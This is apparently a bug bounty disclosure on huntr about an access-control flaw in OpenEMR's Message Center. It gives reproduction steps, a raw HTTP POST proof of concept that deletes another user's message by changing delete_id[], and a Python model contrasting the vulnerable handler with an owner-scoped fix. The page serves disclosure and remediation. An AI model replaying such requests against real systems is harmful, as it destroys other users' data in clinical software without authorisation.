huntr | dyn20 | 2052DA52B8-B808-4B5D-90B1-1A6419B3AE8F
Aug 02, 2022 - 5:52 p.m.

IDOR allows deleting messages in other users' Message Center.

2022-08-02 17:52:38 | dyn20 | www.huntr.dev | 8

Description

I observed that users can delete messages in another user's Message Center by changing the delete_id parameter to the delete_id value of a message that belongs to someone else.

Steps:

  • Log in with the Physician account and note the delete_id[] values of the messages in the Physician's Message Center.
  • Log in with the Clinician account.
  • Go to the Clinician's Message Center, delete a message there, and intercept the request with Burp Suite.
  • Change delete_id[] to the delete_id[] of a message that belongs to the Physician's Message Center (delete_id[] is a form array parameter, so one request can carry more than one id).
  • The message with that delete_id[] is deleted from the Physician's Message Center.

Proof of Concept

POST /openemr/interface/main/messages/messages.php?showall=&sortby=pnotes.date&sortorder=desc&begin=0&form_active=1 HTTP/1.1
Host: demo.openemr.io
Content-Length: 29
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://demo.openemr.io
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://demo.openemr.io/openemr/interface/main/messages/messages.php?form_active=1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: OpenEMR=F%2CirXOlXHBMtyJUilGMZ0%2C9PvCyhZXGdzItmkF7g5BnT8pyP
Connection: close

task=delete&delete_id%5B%5D=7
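The request above is the whole attack: the server trusts the client-supplied delete_id[] and never checks who the message belongs to. The following is an added example, not OpenEMR's code, that models the delete handler in the steps and PoC above: it parses the captured body exactly as shown, applies it to a constructed in-memory table of messages, and contrasts the vulnerable behaviour with a delete that is scoped to the session user. The table layout (id to owner), the user names "clinician" and "physician", and the shape of the fix are assumptions made for illustration; how OpenEMR actually fixed the issue is not stated on this page.

```python
from urllib.parse import parse_qs

# Constructed sample message table (assumption: id -> user the message belongs to).
# Id 7 belongs to the Physician, matching the PoC body above.
SAMPLE_NOTES = {5: "clinician", 6: "clinician", 7: "physician", 8: "physician"}

# Request body copied from the PoC; parse_qs decodes %5B%5D back to "delete_id[]".
POC_BODY = "task=delete&delete_id%5B%5D=7"


def parse_delete_ids(body):
    """Return the integer ids from a delete_id[] form array, or [] when the
    request is not a delete. Non-numeric values are ignored."""
    params = parse_qs(body)
    if params.get("task") != ["delete"]:
        return []
    return [int(raw) for raw in params.get("delete_id[]", []) if raw.isdigit()]


def delete_vulnerable(notes, session_user, body):
    """Vulnerable model: every id the client names is deleted. The session
    user is accepted but never compared against the message owner."""
    deleted = []
    for note_id in parse_delete_ids(body):
        if note_id in notes:
            del notes[note_id]
            deleted.append(note_id)
    return deleted


def delete_hardened(notes, session_user, body):
    """Hardened model: the delete is scoped to messages owned by the session
    user (the equivalent of adding 'AND owner = :session_user' to the DELETE).
    Ids that exist but belong to someone else are refused and reported so the
    attempt can be logged; the request is rejected as a whole."""
    ids = parse_delete_ids(body)
    foreign = [i for i in ids if i in notes and notes[i] != session_user]
    if foreign:
        return {"deleted": [], "rejected": foreign}
    deleted = []
    for note_id in ids:
        if note_id in notes and notes[note_id] == session_user:
            del notes[note_id]
            deleted.append(note_id)
    return {"deleted": deleted, "rejected": []}


def run_scenario():
    """Replay the report: the Clinician's session submits the PoC body that
    names the Physician's message id 7, against both handler models."""
    vuln_table = dict(SAMPLE_NOTES)
    hard_table = dict(SAMPLE_NOTES)
    vuln_result = delete_vulnerable(vuln_table, "clinician", POC_BODY)
    hard_result = delete_hardened(hard_table, "clinician", POC_BODY)
    return {
        "vulnerable_deleted": vuln_result,          # [7]: Physician's message gone
        "vulnerable_remaining": sorted(vuln_table),  # [5, 6, 8]
        "hardened": hard_result,                     # {'deleted': [], 'rejected': [7]}
        "hardened_remaining": sorted(hard_table),    # [5, 6, 7, 8]
    }


if __name__ == "__main__":
    for key, value in run_scenario().items():
        print(f"{key}: {value}")
```

When re-testing after a fix, send the same body from the low-privilege session and confirm that the other user's message is still present afterwards; a 200 response on its own proves nothing, because the vulnerable handler also returns one.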